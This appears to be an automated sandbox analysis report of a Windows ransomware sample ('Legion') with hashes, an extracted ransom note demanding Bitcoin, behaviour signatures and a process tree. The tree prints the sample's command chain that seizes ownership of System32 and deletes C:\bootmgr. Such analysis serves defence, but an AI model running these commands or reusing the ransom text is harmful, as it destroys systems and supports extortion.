Overview

overview

10

Static

static

10

04df8dd30d...a8.exe

windows7-x64

10

04df8dd30d...a8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2023 21:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    04df8dd30da8b5853f48cc1ac9b695a8.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

  • SSDEEP

    3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE

Score
10/10
discoveryevasionexploitpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note
Ooops! All your important files are encrypted! What happend to my computer? All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50. How do i pay? Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet. Contact: 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) In case of no anwser in 72 hours write us to this email: [email protected] What if i already paid? Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software, it may cause pernament data loss. Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Renames multiple (144) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Possible privilege escalation attempt 7 IoCs
    exploit
  • Modifies file permissions 1 TTPs 7 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe
    "C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2992
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2876
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3012
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2692
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3008
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:848
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2536
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 3040 -s 900
        2⤵
          PID:2920

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log
        Filesize

        16B

        MD5

        79bb29efb8fb96f11016ce4754e80b6b

        SHA1

        9ed8d422a9926e01c03bff38c34beadf2522ca7c

        SHA256

        5de2e6ca20d8f3b3a7683cce544979246d9eb2f27a94c184d9a50775ebb7ca02

        SHA512

        d742556f9751c6f73dcc2d80fb5e8643fb1613ea4a67cf923c52c310864b6dde95a3a8e4d02c8309c8778e9cab75d528b52e30988a6eedbadbeb61c0ba76df51

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        Filesize

        1KB

        MD5

        7db09a04d53ec49b19596d7836ac2286

        SHA1

        f92b734a6fd58d4a729d14f32bd69d588d03fb70

        SHA256

        eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7

        SHA512

        fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897

        Download Submit

      • memory/3040-110-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/3040-327-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-0-0x0000000000940000-0x0000000000F60000-memory.dmp

        Filesize

        6.1MB

        Download

      • memory/3040-145-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-323-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-324-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-1-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/3040-2-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-328-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-329-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-330-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-331-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-332-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-333-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download

      • memory/3040-334-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

        Download